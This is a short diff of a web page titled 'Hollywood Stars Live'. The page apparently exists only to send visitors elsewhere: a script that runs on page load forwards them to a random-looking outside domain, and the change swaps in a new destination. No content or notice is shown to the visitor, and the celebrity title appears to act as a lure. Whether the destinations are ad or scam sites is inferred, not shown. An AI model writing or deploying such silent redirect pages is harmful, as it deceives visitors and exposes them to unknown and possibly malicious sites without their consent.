--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <title>Hollywood Stars Live</title>
     <script>
         window.onload = function() {
-            window.location.href = "https://bagfulchiefmeant.com/wpz8utzff?key=0eb7c0c54d17a8951c2b6a235dc6da73";
+            window.location.href = "https://poawooptugroo.com/4/8604246";
         };
     </script>
 </head>
